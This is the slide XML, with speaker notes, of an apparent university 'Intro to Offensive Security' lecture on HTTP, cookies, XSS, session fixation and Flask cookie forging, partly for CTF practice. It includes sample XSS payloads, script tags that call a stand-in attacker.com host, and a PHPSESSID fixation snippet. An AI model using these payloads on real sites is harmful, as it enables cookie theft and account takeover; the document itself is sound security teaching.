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move the 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DejaVu Sans"/>
              </a:rPr>
              <a:t>Click to edit the notes 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6490A33-3582-4048-81DA-0708F36D8CFE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12D0D9F-BA1D-4BCA-A6E3-78B0A289FB0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more dangerous because no amount of browser filtering can catch it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also not obvious at all that something has happened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89D5836-12BE-41EC-AA5F-31B69881D16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F046833-8051-4C0A-AE84-9ED0D509756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4CAD973-EE16-44F1-946A-30E2D79CC2F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26DCC22-1F1A-4BD6-8806-224CAA4FCDF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0C5F60A-055F-48E9-AA20-9CDDCCD4367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A80D6D4-D1EF-41EA-B9C8-923559079DF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800B5C9-D3B2-46D6-AE6B-4E6D20925EB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ID can be anything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0301919-14C0-4947-B522-4B6E4400BCC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User notices they've been logged out: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                <a:latin typeface="DejaVu Sans"/>
                <a:ea typeface="Consolas"/>
              </a:rPr>
              <a:t>cookie foobar isn't linked to anything server-side, so php generates a fresh session</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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701A921-A7F1-41BD-8E04-3B868939F0C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MAC = message authentication code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Basically the server signs the cookie with a secret so that it can verify the integrity of the message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More to come in the crypto section of the class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EF7431-7053-40CA-A12B-4FD5A5B3F17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59624F5-BF61-4045-B6A1-F40E174208A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(or somehow else the secret is leaked)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A56AC52-5C4F-425D-B314-EB83946AA44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Basically only need to care about GET &amp; POST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1.1 is 1.0 but with reusable connections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72D0A66-7BE5-4549-9246-5795E822B94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Also headers like cache control, XSS protection, etc.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469EDA7-D707-452A-BCDF-C3925782500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Header format is always word: value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Having user cookies basically always means being able to impersonate them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E157C3-2F30-452E-872A-CB46DCEF737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REGISTER/LOGIN SHOULD NEVER PUT DATA IN A GET REQUEST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	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:latin typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>In server logs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661477-AE88-4951-9AE5-E498AE343A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REGISTER/LOGIN SHOULD NEVER PUT DATA IN A GET REQUEST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	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:latin typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>In server logs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DejaVu Sans"/>
              </a:rPr>
              <a:t>Does everybody know HTML?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C58703D-EB26-41D1-9ECA-0AA83EDE0B4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DejaVu Sans"/>
              </a:rPr>
              <a:t>Click to edit the title text format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DejaVu Sans"/>
              </a:rPr>
              <a:t>Click to edit the title text format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Week 2 - XSS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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Intro to Offensive Security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Cookie Properties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 (duh)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Domain (can be all subdomains)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Expiration time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flags, 2 of which we care about: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Secure: cookie can only be sent by the browser when using SSL/TLS (HTTPS)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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HTTPOnly: cookie can not be seen from JS</a:t>
            </a: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2761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XSS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4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XSS?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Cross Site Scripting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Basically JavaScript injection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Useful in a number of ways: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Cookie stealing (/privilege escalation)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Performing actions on behalf of the "recipient" of the XSS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Basically doing anything that they/their browser could do on that website</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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XSS Types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Reflected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Injection occurs directly in a GET/POST</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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DejaVu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echo "&lt;p&gt;Hello $name&lt;/p&gt;"</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu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$name = "&lt;script&gt;alert(1)&lt;/script&gt;";</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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nsolas"/>
              </a:rPr>
              <a:t>Persistent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nsolas"/>
              </a:rPr>
              <a:t>Injected content is stored in a DB</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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nsolas"/>
              </a:rPr>
              <a:t>Generally more dangerous</a:t>
            </a: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(Quick Aside) XHR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XMLHTTPRequest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JS built-in way to make HTTP requests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olas"/>
                <a:ea typeface="Consolas"/>
              </a:rPr>
              <a:t>xmlhttp = new XMLHttpRequest();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olas"/>
                <a:ea typeface="Consolas"/>
              </a:rPr>
              <a:t>xmlhttp.open("GET", "http://attacker.com/foo", false);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nsolas"/>
                <a:ea typeface="Consolas"/>
              </a:rPr>
              <a:t>xmlhttp.send(null);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Testing for XSS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all fields, have a small script which GETs back to a server with a unique ID corresponding to the field it came from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Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;jQuery.get('http://attacker.com/1');&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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Consolas"/>
              </a:rPr>
              <a:t>Message: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;jQuery.get('http://attacker.com/2');&lt;/script&gt;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Performing Actions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Simplest thing to do is call a function that already exists to do what you want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 mark another (attacker) account as an administrator</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Will commonly already exist for normal website operation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not, manually construct HTTP request to hit an endpoint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XMLHTTPRequest</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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$.get $.post</a:t>
            </a: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Cookie Exfiltration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Send a request to an attacker-controlled server with cookies in the URL, in POST data, etc.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Again, XMLHTTPRequest or $.get</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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XSS Mitigations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So, just filter `&lt;script`, right?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XSS Again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Other elements have ways to execute JS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Most common technique is with an img</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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&lt;img src="doesntexist.jpg" onerror="javascript:alert(1)" /&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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Many others do as well though</a:t>
            </a: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2761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But first, HTTP</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4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XSS Mitigations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Browser "XSS Auditors"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Generally not a thing in the scope of CTFs</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Persistent injection bypasses</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Possible to get around</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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HttpOnly property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Tie cookies to other, non-changeable parts of the request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 agent</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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IP</a:t>
            </a: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XSS In CTFs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Basically all scenarios are sending a message to an admin for approval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XSS in the supplied name, email, message, etc.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Cookie steal from that to pivot to the admin's account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Commonly uses PhantomJS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will have homework on this!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Other Attacks – Session Fixation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some languages (e.g. PHP), the cookie is just an ID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we can inject JS before login, we can set the cookie ID to a know value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 logs in, and we know the cookie they logged in under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Session Fixation Example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Website home page has XSS vuln</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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Inject `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  <a:ea typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.cookie = "PHPSESSID=foobar;"&lt;/script&gt;`</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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Consolas"/>
              </a:rPr>
              <a:t>User notices they've been logged out, logs in</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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Consolas"/>
              </a:rPr>
              <a:t>Attacker now browses to the site with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
              </a:rPr>
              <a:t>PHPSESSID=foobar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Consolas"/>
              </a:rPr>
              <a:t>, and becomes that user</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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Other Attacks – Decrypting Cookies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Other languages/frameworks (e.g. Python+Flask) store all session data in the cookie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Encoded JSON + MAC</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Leak the secret used to encrypt the MAC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Change the data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Re-MAC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profit</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Other Attacks – Decrypting Cookies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Allows us to change whatever data the server stores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Could lead to another attack vector</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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SQLi</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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Command injection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Decrypting Cookies Example (Flask)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Server-side misconfigured to leak .pyc files (or otherwise misconfigured to reveal the secret)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Attacker logs in to an account, generating a cookie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Attacker decodes the cookie, changes whatever they want (user id, username, etc.)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Attacker re-MACs the cookie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Future accesses to the website with the modified cookie are seemingly valid to the server, but are completely attacker-controlled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Hypertext Transfer Protocol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Foundation of the internet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(Until HTTP2) human readable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Now binary format to reduce size/parsing time</a:t>
            </a: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 Requests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Consolas"/>
              </a:rPr>
              <a:t>GET / HTTP/1.1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Consolas"/>
              </a:rPr>
              <a:t>Host: www.google.com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nsolas"/>
              </a:rPr>
              <a:t>GET is the method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nsolas"/>
              </a:rPr>
              <a:t>/ is the resource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nsolas"/>
              </a:rPr>
              <a:t>HTTP/1.1 is the version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nsolas"/>
              </a:rPr>
              <a:t>Don't worry about 1.0, 1.1 is always what's used</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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nsolas"/>
              </a:rPr>
              <a:t>Host header specifies the domain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nsolas"/>
              </a:rPr>
              <a:t>Virtual hosts - multiple domains on a single IP</a:t>
            </a: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 Responses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Consolas"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK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Consolas"/>
              </a:rPr>
              <a:t>Server: gws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Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: …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nsolas"/>
              </a:rPr>
              <a:t>200 is the response code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nsolas"/>
              </a:rPr>
              <a:t>200, 403, 404, 500</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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nsolas"/>
              </a:rPr>
              <a:t>Headers specify information about the server (gws) or information for the client (set-cookie)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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 Headers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"Attributes" about the request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"Host" was a header in the last example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Both client-&gt;server and server-&gt;client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sought-after: "Cookies"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Set by the server to keep track of who is who</a:t>
            </a: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 Sending Data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Values sent in the requested resource</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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GET /register.php?username=foo&amp;password=bar HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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POST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Values sent encoded in the request body</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu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 /register.php HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu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Content-Length: 25</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu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Content-Type: application/x-www-form-urlencoded</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu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latin typeface="DejaVu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DejaVu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username=foo&amp;password=bar</a:t>
            </a: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 Sending Data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POST content types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application/x-www-form-urlencoded</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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&lt;form&gt;s with no file upload</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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multipart/formdata</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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&lt;form&gt; with file upload</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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application/json</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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JSON (ex. {'username': 'foo', 'password': 'bar'})</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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Most popular with APIs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Cookies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 by the server (Set-Cookie header)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Used to identify you to the server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Implemented in multiple ways</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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PHP: Session ID which just corresponds to data saved server-side</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="DejaVu Sans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Python/Flask: Encoded and MACd with actual data the server wants to store</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike"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Sent with *every* HTTP request for the domain they correspond to</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Application>LibreOffice/6.1.4.2$Linux_X86_64 LibreOffice_project/10$Build-2</Application>
  <Words>1142</Words>
  <Paragraphs>197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2017-09-13T04:46:55Z</dcterms:created>
  <dc:creator>Microsoft Office User</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-28T21:58:02Z</dcterms:modified>
  <cp:revision>56</cp:revision>
  <dc:subject/>
  <dc:title>Week 2 - XSS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